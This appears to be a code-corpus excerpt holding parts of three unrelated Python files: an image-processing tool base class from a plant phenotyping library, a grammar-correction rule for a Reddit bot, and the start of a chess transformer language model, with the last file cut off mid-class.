kwargs.get(\"progress_callback\", None)\r\n 
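# the grid search below enumerates the cartesian product of every parameter's\r\n # decoded options; random_grid_search shuffles that product before running\r\n 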
random_grid_search = kwargs.get(\"random_grid_search\", False)\r\n\r\n def lcl_callback(step, total, msg, image_dict={}):\r\n if progress_callback is not None:\r\n return progress_callback(step, total, msg, image_dict)\r\n else:\r\n print(msg)\r\n return True\r\n\r\n tmp_wrapper = kwargs.get(\"wrapper\", None)\r\n if tmp_wrapper is not None:\r\n self.wrapper = tmp_wrapper\r\n elif self.wrapper is None:\r\n self._kwargs = kwargs\r\n self._wrapper = self._get_wrapper()\r\n self._wrapper.reset()\r\n self._kwargs = None\r\n\r\n if self.wrapper is None:\r\n return False\r\n\r\n procs = list(\r\n itertools.product(*[p.decode_grid_search_options() for p in self.gizmos])\r\n )\r\n if random_grid_search:\r\n random.shuffle(procs)\r\n tot_ = len(procs)\r\n keys = [p.name for p in self.gizmos]\r\n lcl_callback(0, tot_, f\"_____________________________________\")\r\n lcl_callback(0, tot_, f\"Instantiated tools\")\r\n for i, p in enumerate(procs):\r\n kwargs_ = {k: (int(v) if str.isdigit(v) else v) for k, v in zip(keys, p)}\r\n kwargs_[\"progress_callback\"] = progress_callback\r\n ip = self.__class__(**kwargs_)\r\n self.wrapper.image_list = []\r\n kwargs_[\"wrapper\"] = self.wrapper\r\n kwargs_[\"reset_wrapper\"] = False\r\n if ip.process_wrapper(**kwargs_):\r\n img_lst_ = ip.wrapper.image_list\r\n if len(img_lst_) > 0:\r\n if kwargs.get(\"send_all_images\", False):\r\n for dic in ip.wrapper.image_list:\r\n go_on = lcl_callback(\r\n i + 1,\r\n tot_,\r\n f\"\"\"{ip.name}:\r\n {ip.input_params_as_str(exclude_defaults=True,\r\n excluded_params=(\"progress_callback\",))}\"\"\",\r\n dic,\r\n )\r\n if go_on is False:\r\n return\r\n else:\r\n dic = ip.wrapper.retrieve_image_dict(\"mosaic_out\")\r\n if dic is None:\r\n dic = ip.wrapper.retrieve_image_dict(\"mosaic\")\r\n if dic is None:\r\n dic = img_lst_[len(img_lst_) - 1]\r\n go_on = lcl_callback(\r\n i + 1,\r\n tot_,\r\n f\"\"\"{ip.name}:\r\n {ip.input_params_as_str(exclude_defaults=True, \r\n excluded_params=(\"progress_callback\",))}\"\"\",\r\n dic,\r\n )\r\n if go_on is False:\r\n return\r\n else:\r\n go_on = lcl_callback(i + 1, tot_, f\"Failed {str(ip)}\")\r\n if not go_on:\r\n return\r\n\r\n def do_channel_failure(self, channel):\r\n self.wrapper.store_image(\r\n self.wrapper.current_image, f\"Missing {channel} channel\", text_overlay=True\r\n )\r\n logger.error(f\"Missing {channel} channel\")\r\n\r\n def _get_wrapper(self):\r\n if \"wrapper\" in self.kwargs:\r\n value = self.kwargs.get(\"wrapper\", None)\r\n if isinstance(value, str):\r\n self.wrapper = BaseImageProcessor(value)\r\n else:\r\n self._wrapper = value\r\n return self._wrapper\r\n\r\n def get_mask(self):\r\n mask = self.wrapper.mask\r\n if mask is None:\r\n img = self.wrapper.current_image\r\n if np.sum(img[img != 255]) == 0:\r\n mask = self.wrapper.get_channel(src_img=img, channel=\"bl\")\r\n return mask\r\n\r\n def to_uint8(self, img, normalize: bool = False):\r\n if str(img.dtype) == \"bool\":\r\n img = img.astype(np.uint8)\r\n img[img != 0] = 255\r\n return img\r\n elif (\r\n (str(img.dtype) == \"float64\")\r\n or (str(img.dtype) == \"float16\")\r\n or (str(img.dtype) == \"int32\")\r\n ):\r\n return ((img - img.min()) / (img.max() - img.min()) * 255).astype(np.uint8)\r\n elif str(img.dtype) == \"uint8\":\r\n if normalize:\r\n if len(img.shape) == 2:\r\n return ((img - img.min()) / (img.max() - img.min()) * 255).astype(\r\n np.uint8\r\n )\r\n else:\r\n c1, c2, c3 = cv2.split(img)\r\n c1, c2, c3 = (\r\n cv2.equalizeHist(c1),\r\n cv2.equalizeHist(c2),\r\n cv2.equalizeHist(c3),\r\n )\r\n 
return np.dstack((c1, c2, c3))\r\n else:\r\n return img.copy()\r\n else:\r\n logger.error(f\"Unknown source format {str(img.dtype)}\")\r\n\r\n def to_fuzzy(self, img):\r\n \"\"\"\r\n Converts image to float numbers constrained between 0 & 1\r\n :param img:\r\n :return: image\r\n \"\"\"\r\n if str(img.dtype) == \"bool\":\r\n img = img.astype(np.uint8)\r\n return img\r\n elif (\r\n (str(img.dtype) == \"float64\")\r\n or (str(img.dtype) == \"int32\")\r\n or (str(img.dtype) == \"uint8\")\r\n ):\r\n return ((img - img.min()) / (img.max() - img.min()) * 1).astype(float)\r\n else:\r\n logger.error(f\"Unknown source format {str(img.dtype)}\")\r\n\r\n def to_bit(self, img, threshold=255):\r\n \"\"\"\r\n Converts image data to either 0 or 1, be careful with what you wish for\r\n :param img:\r\n :param threshold:\r\n :return: image\r\n \"\"\"\r\n if str(img.dtype) == \"bool\":\r\n img = img.astype(np.uint8)\r\n return img\r\n elif str(img.dtype) == \"uint8\":\r\n img[img < threshold] = 0\r\n img[img >= threshold] = 1\r\n return img\r\n elif (str(img.dtype) == \"float64\") or (str(img.dtype) == \"int32\"):\r\n return ((img - img.min()) / (img.max() - img.min()) * 1).astype(np.uint8)\r\n else:\r\n logger.error(f\"Unknown source format {str(img.dtype)}\")\r\n\r\n @staticmethod\r\n def apply_mask(image, mask):\r\n return cv2.bitwise_and(image, image, mask=mask)\r\n\r\n def match_image_size_to_source(\r\n self,\r\n img,\r\n source_mode: str = \"source_file\",\r\n ignore_list: tuple = (),\r\n ):\r\n if not (source_mode in ignore_list):\r\n source_type = self.get_value_of(source_mode, \"source\")\r\n else:\r\n return img\r\n\r\n if source_type == \"process_roi\":\r\n self.wrapper.init_rois()\r\n return self.wrapper.crop_to_roi(img, type(self).__name__.lower())\r\n elif source_type == \"cropped_source\":\r\n self.wrapper.init_rois()\r\n return self.wrapper.crop_to_keep_roi(img=img)\r\n else:\r\n return img\r\n\r\n def get_ipt_roi(self, wrapper, roi_names: list = []) -> list:\r\n res = []\r\n for roi in wrapper.rois_list:\r\n if roi.name in roi_names:\r\n res.append(roi)\r\n return res\r\n\r\n def get_short_hash(\r\n self,\r\n exclude_list: tuple = (),\r\n add_plant_name: bool = True,\r\n ) -> Union[str, None]:\r\n wrapper = self.wrapper\r\n if wrapper is None:\r\n return None\r\n p_str = self.input_params_as_str(\r\n exclude_defaults=False, excluded_params=exclude_list\r\n ).encode(\"utf-8\")\r\n w_str = str(wrapper).encode(\"utf-8\")\r\n long_hash = hashlib.sha1(p_str + w_str)\r\n\r\n if add_plant_name:\r\n return (\r\n wrapper.plant\r\n + \"_\"\r\n + make_safe_name(\r\n str(base64.urlsafe_b64encode(long_hash.digest()[0:20]))\r\n ).replace(\"_\", \"\")\r\n )\r\n else:\r\n return make_safe_name(\r\n str(base64.urlsafe_b64encode(long_hash.digest()[0:20]))\r\n ).replace(\"_\", \"\")\r\n\r\n def hash_luid(self):\r\n return make_safe_name(\r\n str(\r\n base64.urlsafe_b64encode(\r\n hashlib.sha1(self.wrapper.luid.encode(\"utf-8\")).digest()[0:20]\r\n )\r\n )\r\n ).replace(\"_\", \"\")\r\n\r\n def get_channel(self, channel):\r\n median_filter_size = self.get_value_of(\"median_filter_size\")\r\n return self.wrapper.get_channel(\r\n src_img=self.wrapper.current_image,\r\n channel=channel,\r\n median_filter_size=(\r\n 0 if median_filter_size == 1 else ipc.ensure_odd(median_filter_size)\r\n ),\r\n )\r\n\r\n def apply_binary_threshold(self, wrapper, img, channel):\r\n min_ = self.get_value_of(\"min_t\")\r\n max_ = self.get_value_of(\"max_t\")\r\n median_filter_size = self.get_value_of(\"median_filter_size\")\r\n 
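# a median filter size of 1 is a no-op, so treat it as disabled; any other\r\n # value is forced odd via ipc.ensure_odd before computing the mask\r\n 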
median_filter_size = (\r\n 0 if median_filter_size == 1 else ipc.ensure_odd(median_filter_size)\r\n )\r\n\r\n min_, max_ = min(min_, max_), max(min_, max_)\r\n\r\n mask, _ = wrapper.get_mask(\r\n src_img=img,\r\n channel=channel,\r\n min_t=min_,\r\n max_t=max_,\r\n median_filter_size=median_filter_size,\r\n )\r\n\r\n return self.apply_morphology_from_params(mask)\r\n\r\n def apply_morphology(\r\n self,\r\n mask,\r\n morph_op=\"none\",\r\n kernel_size=3,\r\n iter_count=1,\r\n kernel_shape=\"ellipse\",\r\n ):\r\n if mask is None:\r\n return None\r\n\r\n if not (len(mask.shape) == 2 or (len(mask.shape) == 3 and mask.shape[2] == 1)):\r\n logger.error(\"Morphology works only on mask images\")\r\n return None\r\n\r\n if kernel_shape == \"rectangle\":\r\n k_shape = cv2.MORPH_RECT\r\n elif kernel_shape == \"cross\":\r\n k_shape = cv2.MORPH_CROSS\r\n else:\r\n k_shape = cv2.MORPH_ELLIPSE\r\n\r\n if kernel_size <= 1:\r\n return mask\r\n elif (kernel_size % 2 == 0) and (kernel_size > 0):\r\n kernel_size += 1\r\n\r\n func = getattr(self._wrapper, morph_op, None)\r\n if func:\r\n return func(\r\n mask,\r\n kernel_size=kernel_size,\r\n proc_times=iter_count,\r\n kernel_shape=k_shape,\r\n )\r\n else:\r\n return mask\r\n\r\n def apply_morphology_from_params(self, mask, store_result: bool = False):\r\n ret = self.apply_morphology(\r\n mask=mask,\r\n morph_op=self.get_value_of(\"morph_op\"),\r\n kernel_size=self.get_value_of(\"kernel_size\", 0),\r\n iter_count=self.get_value_of(\"proc_times\", 1),\r\n kernel_shape=self.get_value_of(\"kernel_shape\", None),\r\n )\r\n\r\n if ret is not None and store_result:\r\n self.wrapper.store_image(image=ret, text=\"morphology_applied\")\r\n\r\n return ret\r\n\r\n @staticmethod\r\n def get_labels_as_dict(\r\n watershed_image,\r\n labels,\r\n min_size=-1,\r\n ):\r\n res = []\r\n # loop over the unique labels returned by the Watershed\r\n # algorithm\r\n for label in np.unique(labels):\r\n # if the label is zero, we are examining the 'background'\r\n # so simply ignore it\r\n if label == 0:\r\n continue\r\n\r\n # otherwise, allocate memory for the label region and draw\r\n # it on the mask\r\n mask = np.zeros(watershed_image.shape[:2], dtype=\"uint8\")\r\n mask[labels == label] = 255\r\n\r\n # detect contours in the mask and grab the largest one\r\n contours_ = ipc.get_contours(\r\n mask=mask,\r\n retrieve_mode=cv2.RETR_EXTERNAL,\r\n method=cv2.CHAIN_APPROX_SIMPLE,\r\n )\r\n c = max(contours_, key=cv2.contourArea)\r\n\r\n # Draw min area rect enclosing object\r\n if cv2.contourArea(c) < min_size:\r\n continue\r\n x, y, w, h = cv2.boundingRect(c)\r\n res.append({\"id\": label, \"x\": x, \"y\": y, \"w\": w, \"h\": h})\r\n return res\r\n\r\n def compose_image_with_rois(self, fgd_img, bkg_img, rois=None):\r\n if rois is None:\r\n rois = self.get_ipt_roi(\r\n wrapper=self.wrapper,\r\n roi_names=self.get_value_of(\"roi_names\").replace(\" \", \"\").split(\",\"),\r\n )\r\n if len(rois) > 0:\r\n return regions.copy_rois(rois=rois, src=fgd_img, dst=bkg_img)\r\n else:\r\n return fgd_img\r\n\r\n def draw_rois_on_image(self, img, line_width=2, rois=None):\r\n if rois is None:\r\n rois = self.get_ipt_roi(\r\n wrapper=self.wrapper,\r\n roi_names=self.get_value_of(\"roi_names\").replace(\" \", \"\").split(\",\"),\r\n )\r\n ret = img.copy()\r\n if len(rois) > 0:\r\n for roi in rois:\r\n ret = roi.draw_to(ret, line_width=line_width)\r\n\r\n return ret\r\n\r\n def print_segmentation_labels(\r\n self,\r\n watershed_image,\r\n labels,\r\n dbg_suffix=\"\",\r\n min_size=-1,\r\n ):\r\n # loop over the 
unique labels returned by the Watershed\r\n # algorithm\r\n for label in np.unique(labels):\r\n # if the label is zero, we are examining the 'background'\r\n # so simply ignore it\r\n if label == 0:\r\n continue\r\n\r\n # otherwise, allocate memory for the label region and draw\r\n # it on the mask\r\n mask = np.zeros(watershed_image.shape[:2], dtype=\"uint8\")\r\n mask[labels == label] = 255\r\n\r\n # detect contours in the mask and grab the largest one\r\n contours_ = ipc.get_contours(\r\n mask=mask,\r\n retrieve_mode=cv2.RETR_EXTERNAL,\r\n method=cv2.CHAIN_APPROX_SIMPLE,\r\n )\r\n c = max(contours_, key=cv2.contourArea)\r\n\r\n # Draw min area rect enclosing object\r\n x, y, w, h = cv2.boundingRect(c)\r\n area_ = cv2.contourArea(c)\r\n is_area_enough = area_ > min_size\r\n draw_color = (255, 255, 255) if is_area_enough else (0, 0, 0)\r\n cv2.rectangle(watershed_image, (x, y), (x + w, y + h), draw_color, 4)\r\n cv2.drawContours(watershed_image, [c], 0, draw_color, 4)\r\n cv2.putText(\r\n watershed_image,\r\n f\"#{label}: {area_}\",\r\n (x - 10, y),\r\n cv2.FONT_HERSHEY_SIMPLEX,\r\n 0.6,\r\n draw_color,\r\n 2,\r\n )\r\n\r\n self._wrapper.store_image(watershed_image, f\"{dbg_suffix}_vis_labels\")\r\n\r\n return watershed_image\r\n\r\n def help_stub(self):\r\n res = '\"\"\"\\n'\r\n res += f\"{self.name}:\\n\"\r\n res += self.description\r\n res += \"\\n\"\r\n res += f\"Real time: {str(self.real_time)}\\n\"\r\n res += \"\\n\"\r\n res += \"Keyword Arguments (in parentheses, argument name):\\n\"\r\n if self.has_input:\r\n for p in self.gizmos:\r\n if p.is_input:\r\n res += f\" * {p.desc} ({p.name}): {p.hint}\".rstrip() + \"\\n\"\r\n if self.has_input and self.has_output:\r\n res += \"--------------\\n\"\r\n if self.has_output:\r\n for p in self.gizmos:\r\n if p.is_output and not p.is_neutral:\r\n res += f\" * output ({p.name}): {p.desc}\".rstrip() + \"\\n\"\r\n res += '\"\"\"\\n'\r\n\r\n return res\r\n\r\n def input_params_as_str(\r\n self,\r\n exclude_defaults: bool = True,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return \", \".join(\r\n [\r\n f\"{p.name}={p.str_value}\"\r\n for p in self.input_params(\r\n exclude_defaults=exclude_defaults,\r\n excluded_params=excluded_params,\r\n forced_params=forced_params,\r\n )\r\n ]\r\n )\r\n\r\n def input_params_as_html(\r\n self,\r\n exclude_defaults: bool = True,\r\n excluded_params: tuple = (),\r\n forced_params: tuple = (),\r\n ):\r\n return (\r\n \"
<ul>\"\r\n + \"\".join(\r\n f\"<li>{p.name}={p.str_value}</li>\"\r\n for p in self.input_params(\r\n exclude_defaults=exclude_defaults,\r\n excluded_params=excluded_params,\r\n forced_params=forced_params,\r\n )\r\n )\r\n + \"</ul>
\"\r\n )\r\n\r\n def code_imports(self, **kwargs):\r\n ret = [f\"from {self.__module__} import {type(self).__name__}\"]\r\n if kwargs.get(\"build_wrapper\", \"yes\") is not False:\r\n ret.append(\r\n \"from ipso_phen.ipapi.base.ip_abstract import BaseImageProcessor\"\r\n )\r\n return ret\r\n\r\n def code_apply_roi(self, print_result=None, white_spaces=\"\"):\r\n ws = \"\".join(\r\n [\r\n \" \"\r\n for _ in range(0, len(f\"{white_spaces}ipt_res = ipt.process_wrapper(\"))\r\n ]\r\n )\r\n params_ = f\",\\n{ws}\".join(\r\n [\r\n f\"{p.name}={p.str_value}\"\r\n for p in self.input_params(exclude_defaults=True)\r\n ]\r\n )\r\n code_ = f'{white_spaces}if wrapper is None:\\n{white_spaces} raise RuntimeError(\"Missing wrapper\")\\n'\r\n\r\n code_ += f\"{white_spaces}ipt = {type(self).__name__}({params_})\\n\"\r\n code_ += f'{white_spaces}if callable(getattr(ipt, \"apply_roy\")):\\n'\r\n add_ws = \" \"\r\n code_ += f\"{white_spaces}{add_ws}wrapper.current_image = ipt.apply_roy(wrapper=wrapper)\\n\"\r\n\r\n return code_\r\n\r\n def code_body(self, **kwargs):\r\n use_with_clause = kwargs.get(\"use_with_clause\", False)\r\n build_wrapper = kwargs.get(\"build_wrapper\", \"yes\")\r\n file_name = kwargs.get(\"file_name\", \"\")\r\n white_spaces = kwargs.get(\"white_spaces\", \"\")\r\n target_data_base = kwargs.get(\"target_data_base\", None)\r\n\r\n if file_name:\r\n wrapper_ = file_name\r\n else:\r\n wrapper_ = self.file_name\r\n\r\n wrapper_ = \"{file}\"\r\n if use_with_clause:\r\n ws = \"\".join(\r\n [\r\n \" \"\r\n for _ in range(0, len(f\"{white_spaces}with {type(self).__name__}(\"))\r\n ]\r\n )\r\n else:\r\n ws = \"\".join(\r\n [\r\n \" \"\r\n for _ in range(\r\n 0, len(f\"{white_spaces}ipt_res = ipt.process_wrapper(\")\r\n )\r\n ]\r\n )\r\n params_ = f\",\\n{ws}\".join(\r\n [\r\n f\"{p.name}={p.str_value}\"\r\n for p in self.input_params(exclude_defaults=True)\r\n ]\r\n )\r\n if use_with_clause or (build_wrapper is False):\r\n if build_wrapper is False:\r\n wrapper_param = wrapper_\r\n else:\r\n wrapper_param = \"wrapper\"\r\n if params_:\r\n params_ = f\",\\n{ws}\".join([f\"wrapper={wrapper_param}\", params_])\r\n else:\r\n params_ = f\"wrapper={wrapper_param}\"\r\n\r\n if (build_wrapper is True) or (build_wrapper == \"yes\"):\r\n code_ = f\"{white_spaces}wrapper = BaseImageProcessor({wrapper_})\\n\"\r\n if target_data_base:\r\n code_ += f\"{white_spaces}wrapper.target_database = target_data_base\\n\"\r\n code_ += f\"{white_spaces}wrapper.lock = True\\n\"\r\n elif build_wrapper == \"expected\":\r\n code_ = f'{white_spaces}if wrapper is None:\\n{white_spaces} raise RuntimeError(\"Missing wrapper\")\\n'\r\n else:\r\n code_ = \"\"\r\n\r\n if use_with_clause:\r\n code_ += (\r\n f\"{white_spaces}with {type(self).__name__}({params_}) as (res, ed):\\n\"\r\n )\r\n add_ws = \" \"\r\n code_ += f\"{white_spaces}{add_ws}if res:\\n\"\r\n code_ += f\"{white_spaces}{add_ws}{add_ws}return ed.result\\n\"\r\n code_ += f\"{white_spaces}{add_ws}else:\\n\"\r\n code_ += (\r\n f\"{white_spaces}{add_ws}{add_ws}\"\r\n + 'print(f\"Process error: {str(wrapper.error_holder)}\")\\n'\r\n )\r\n else:\r\n code_ += f\"{white_spaces}ipt = {type(self).__name__}()\\n\"\r\n if build_wrapper is not False:\r\n code_ += f\"{white_spaces}ipt.wrapper = wrapper\\n\"\r\n code_ += f\"{white_spaces}ipt_res = ipt.process_wrapper({params_})\\n\"\r\n if self.result_name and (self.result_name != \"none\"):\r\n code_ += f\"{white_spaces}{self.result_name} = ipt.result\\n\"\r\n code_ += f\"{white_spaces}if not ipt_res:\\n\"\r\n code_ += (\r\n 
f\"{white_spaces} \"\r\n + 'print(f\"Process error: {str(ipt.wrapper.error_holder)}\")\\n'\r\n )\r\n\r\n return code_\r\n\r\n def code(self, **kwargs):\r\n return (\r\n \"\\n\".join(self.code_imports(**kwargs)) + \"\\n\\n\\n\" + self.code_body(**kwargs)\r\n )\r\n\r\n def apply_test_values_overrides(self, use_cases: tuple = ()):\r\n pass\r\n\r\n @abstractproperty\r\n def name(self):\r\n return \"Base abstract image processing tool\"\r\n\r\n @property\r\n def description(self):\r\n return \"\\n\"\r\n\r\n @property\r\n def hint(self):\r\n if self.process_wrapper.__doc__ is not None:\r\n return inspect.getdoc(self.process_wrapper)\r\n else:\r\n return self.help_stub()\r\n\r\n @property\r\n def needs_doc_string(self):\r\n return self.process_wrapper.__doc__ is None\r\n\r\n @property\r\n def real_time(self):\r\n return False\r\n\r\n @property\r\n def wrapper(self) -> BaseImageProcessor:\r\n return self._wrapper\r\n\r\n @wrapper.setter\r\n def wrapper(self, value):\r\n self._wrapper = value\r\n\r\n @property\r\n def is_ready(self):\r\n return self._wrapper is not None\r\n\r\n @property\r\n def order(self):\r\n return 9999\r\n\r\n @property\r\n def output_kind(self):\r\n return \"\"\r\n\r\n @property\r\n def use_case(self):\r\n return [\"none\"]\r\n\r\n @property\r\n def result(self):\r\n return self._result\r\n\r\n @result.setter\r\n def result(self, value):\r\n self._result = value\r\n\r\n @property\r\n def result_name(self):\r\n return \"none\"\r\n\r\n @property\r\n def kwargs(self):\r\n return self._kwargs\r\n\r\n @property\r\n def lock_once_added(self):\r\n return False\r\n\r\n @property\r\n def file_name(self):\r\n if self.wrapper is not None:\r\n return f'\"{self.wrapper.file_path}\"'\r\n else:\r\n return \"{file}\"\r\n\r\n @property\r\n def package(self):\r\n return \"IPSO Phen\"\r\n\r\n @property\r\n def is_wip(self):\r\n return False\r\n\r\n @property\r\n def is_deprecated(self):\r\n return False\r\n\r\n @property\r\n def short_test_script(self):\r\n return self.is_wip or self.is_deprecated\r\n\r\n @property\r\n def needs_previous_mask(self):\r\n return False\r\n\r\n @property\r\n def input_type(self):\r\n if set(self.use_case).intersection(\r\n set(\r\n (\r\n ipc.ToolFamily.EXPOSURE_FIXING,\r\n ipc.ToolFamily.IMAGE_GENERATOR,\r\n ipc.ToolFamily.PRE_PROCESSING,\r\n ipc.ToolFamily.THRESHOLD,\r\n ipc.ToolFamily.WHITE_BALANCE,\r\n ipc.ToolFamily.ROI,\r\n )\r\n )\r\n ):\r\n return ipc.IO_IMAGE\r\n elif set(self.use_case).intersection(\r\n set((ipc.ToolFamily.FEATURE_EXTRACTION, ipc.ToolFamily.MASK_CLEANUP))\r\n ):\r\n return ipc.IO_MASK\r\n else:\r\n return ipc.IO_NONE\r\n\r\n @property\r\n def output_type(self):\r\n if set(self.use_case).intersection(\r\n set(\r\n (\r\n ipc.ToolFamily.EXPOSURE_FIXING,\r\n ipc.ToolFamily.PRE_PROCESSING,\r\n ipc.ToolFamily.WHITE_BALANCE,\r\n )\r\n )\r\n ):\r\n return ipc.IO_IMAGE\r\n elif set(self.use_case).intersection(\r\n set((ipc.ToolFamily.THRESHOLD, ipc.ToolFamily.MASK_CLEANUP))\r\n ):\r\n return ipc.IO_MASK\r\n elif set(self.use_case).intersection(set((ipc.ToolFamily.ROI,))):\r\n return ipc.IO_ROI\r\n elif set(self.use_case).intersection(\r\n set((ipc.ToolFamily.IMAGE_GENERATOR, ipc.ToolFamily.FEATURE_EXTRACTION))\r\n ):\r\n return ipc.IO_DATA\r\n elif set(self.use_case).intersection(set((ipc.ToolFamily.VISUALIZATION,))):\r\n return ipc.IO_IMAGE\r\n else:\r\n return ipc.IO_NONE\r\n\r\n @property\r\n def required_images(self):\r\n return []\r\n\r\n @property\r\n def skip_tests(self):\r\n return []\r\n\r\n\r\nfrom ipso_phen.ipapi.tools.common_functions 
import get_module_classes\r\nimport ipso_phen.ipapi.ipt as ipt_module\r\n\r\n\r\ndef build_tool_from_name(tool_name):\r\n # Build unique class list\r\n ipt_classes_list = get_module_classes(\r\n package=ipt_module,\r\n class_inherits_from=IptBase,\r\n remove_abstract=True,\r\n )\r\n\r\n for cls in ipt_classes_list:\r\n if cls.name == tool_name:\r\n return cls()\r\n else:\r\n return None\r\n","repo_name":"tpmp-inra/ipso_phen","sub_path":"ipso_phen/ipapi/base/ipt_abstract.py","file_name":"ipt_abstract.py","file_ext":"py","file_size_in_byte":77166,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"3304372643","text":"#!/usr/bin/env python\n\nSET_3 = set(['he', 'she', 'it'])\nSET_2 = set(['we', 'you', 'they'])\n\n\ndef do(self, cur):\n \"\"\"Keyword: supposed\n Src: ( doesn't|I don't| (? [aren't], didn't -> [wasn't/weren't]\n \"\"\"\n if not self.sequence.next_has_continuous(1):\n return\n if self.sequence.next_word(1).word_lower != 'to':\n return\n if not self.sequence.prev_has_continuous(2):\n return\n person = 2 # Note that 2nd person = plural\n prev_word_1 = self.sequence.prev_word(1)\n prev_word_2 = self.sequence.prev_word(2)\n if prev_word_1.word_lower == \"don't\":\n if prev_word_2.word_lower == \"i\":\n person = 1\n elif prev_word_2.word_lower in SET_3:\n person = 3\n # else: person = 2\n elif prev_word_1.word_lower == \"doesn't\":\n if prev_word_2.word_lower == \"i\":\n person = 1\n elif not prev_word_2.word_lower in SET_2:\n person = 3\n # else: person = 2\n elif prev_word_1.word_lower == \"didn't\":\n if prev_word_2.word_lower == \"i\" or prev_word_2.word_lower in SET_2:\n person = 4\n elif prev_word_2.word_lower in SET_3:\n person = 5\n else:\n return # unknown conjugation\n else:\n return\n self.matched('supposed-to')\n cur.mark_common()\n self.sequence.next_word(1).mark_common()\n if person == 1:\n # special: [I'm not] supposed to\n prev_word_2.replace(\"I'm\")\n prev_word_1.replace('not')\n elif person == 2:\n prev_word_1.replace(\"aren't\")\n self.rerun.add(11) # Rerun: your_are for \"you aren't\"\n elif person == 3:\n prev_word_1.replace(\"isn't\")\n elif person == 4:\n prev_word_1.replace(\"weren't\")\n else: # if person == 5:\n prev_word_1.replace(\"wasn't\")\n","repo_name":"vwww/bot-reddit-grammar_py","sub_path":"app/grammar/Corrections/supposed_to.py","file_name":"supposed_to.py","file_ext":"py","file_size_in_byte":1901,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"39124897002","text":"import torch\nfrom math import sqrt, log\nimport random\nfrom torch.nn import Module, Linear, Sequential\nfrom torch.nn import Embedding, LayerNorm\nfrom torch.nn import Sigmoid, ReLU, GELU\nfrom torch.distributions import Categorical\nimport numpy as np\nimport chess\nfrom .targets import maketargets, bytes_to_tensor\n\n\nclass CrossEntropyLoss(Module):\n def __init__(self, n_classes):\n super().__init__()\n self.n_classes = n_classes\n self.crossentropyloss = (\n torch.nn.CrossEntropyLoss(reduction='none'))\n\n def forward(self, x, y):\n return self.crossentropyloss(\n x.view(-1, self.n_classes),\n y.view(-1)).view(x.shape[:-1]\n )/log(2)\n\n\nclass Nonlinearity(Module):\n def __init__(self, **config):\n super().__init__()\n self.nonlinearity = config[\"nonlinearity\"]\n self.f = {\"sigmoid\": Sigmoid(), \"ReLU\": ReLU(),\n \"GELU\": GELU()}[self.nonlinearity]\n\n def forward(self, x):\n return self.f(x)\n\n\nclass MLP(Module):\n def __init__(self, **config):\n 
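# position-wise feed-forward block: expand d_model to d_hidden, apply the\n # configured nonlinearity, then project back down to d_model\n 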
super().__init__()\n m = config[\"d_model\"]\n n = config[\"d_hidden\"]\n self.model = Sequential(\n Linear(m, n, bias=True),\n Nonlinearity(**config),\n Linear(n, m, bias=True))\n\n def forward(self, x):\n return self.model(x)\n\n\nclass Mask(Module):\n def __init__(self, **config):\n super().__init__()\n self.mask = config[\"mask\"]\n\n def forward(self, x):\n n, device = x.shape[-1], x.device\n if self.mask == \"none\":\n return x\n elif self.mask == \"causal\":\n return x+(1-1/torch.tril(torch.ones((n,n),\n device=device)))\n\n\nclass Attn(Module):\n def __init__(self, **config):\n super().__init__()\n d_model = self.d_model = config[\"d_model\"]\n d_k = self.d_k = config[\"d_k\"]\n d_v = self.d_v = config[\"d_v\"]\n n_heads = self.n_heads = config[\"n_heads\"]\n self.query_proj = Linear(d_model, d_k*n_heads)\n self.key_proj = Linear(d_model, d_k*n_heads)\n self.value_proj = Linear(d_model, d_v*n_heads)\n self.mask = Mask(**config)\n self.softmax = torch.nn.Softmax(dim=-1)\n self.linear = Linear(d_v*n_heads, d_model, bias=False)\n\n def forward(self, x):\n n_ctx = x.shape[-2]\n split_heads = lambda x: x.view(x.shape[:-1] +\n (self.n_heads, -1)).transpose(-2,\n -3).contiguous()\n merge_heads = lambda x: x.transpose(-2,\n -3).contiguous().view(x.shape[:-3] +\n (n_ctx, self.d_v*self.n_heads))\n (Q, K, V) = map(split_heads,(self.query_proj(x),\n self.key_proj(x), self.value_proj(x)))\n QKT = torch.matmul(Q/sqrt(self.d_k),\n K.transpose(-1,-2))\n U = self.softmax(self.mask(QKT))\n return self.linear(merge_heads(U@V))\n\n\nclass ResidualLayerNorm(Module):\n def __init__(self, layer, d_model):\n super().__init__()\n self.d_model = d_model\n self.layer = layer\n self.layernorm = LayerNorm(d_model)\n\n def forward(self, x):\n return self.layernorm(x+self.layer(x))\n\n\nclass TransformerLayer(Module):\n def __init__(self, **config):\n super().__init__()\n d_model = config[\"d_model\"]\n self.model = Sequential(\n ResidualLayerNorm(Attn(**config), d_model),\n ResidualLayerNorm(MLP(**config), d_model))\n\n def forward(self, x):\n return self.model(x)\n\n\nclass PositionalEncoding(Module):\n def __init__(self, **config):\n super().__init__()\n n_ctx = config[\"n_ctx\"]\n d_model = config[\"d_model\"]\n init_weights = 0.02*torch.randn(n_ctx, d_model)\n self.weight = torch.nn.Parameter(init_weights)\n\n def forward(self, x):\n n_ctx = x.shape[-2]\n return x + self.weight[:n_ctx]\n\n\nclass View(Module):\n def __init__(self, *suffix):\n super().__init__()\n self.suffix = suffix\n\n def forward(self, x):\n return x.view(*x.shape[:-1], *self.suffix)\n\n\nclass ChessLanguageModel(Module):\n def __init__(self, **config):\n super().__init__()\n self.config = {\n \"n_classes\": 256,\n \"n_ctx\": 4096,\n \"n_layers\": 3,\n \"plan\": [0,1,2],\n \"d_model\": 4096,\n \"d_hidden\": 4096,\n \"d_k\": 64,\n \"d_v\": 64,\n \"n_heads\": 64,\n \"nonlinearity\": \"GELU\",\n \"mask\": \"causal\",\n \"device\": \"cuda\"}\n self.config.update(config or dict())\n config = self.config\n n_ctx = config[\"n_ctx\"]\n n_layers = config[\"n_layers\"]\n plan = config[\"plan\"]\n d_model = config[\"d_model\"]\n d_hidden = config[\"d_hidden\"]\n device = config[\"device\"]\n make_layer = lambda: TransformerLayer(**config)\n self.layers = [make_layer() for _ in\n range(n_layers)]\n self.model = Sequential(\n Embedding(256, d_model),\n PositionalEncoding(**config),\n Sequential(*[self.layers[i] for i in plan]))\n self.seq_head = Linear(d_model, 256)\n self.visual_head = Sequential(Linear(d_model,\n 64*13), View(64, 13))\n 
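# the action head emits a (256, 2) logit grid per position, scored with the\n # 2-way cross entropy criterion against action_target in forward()\n 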
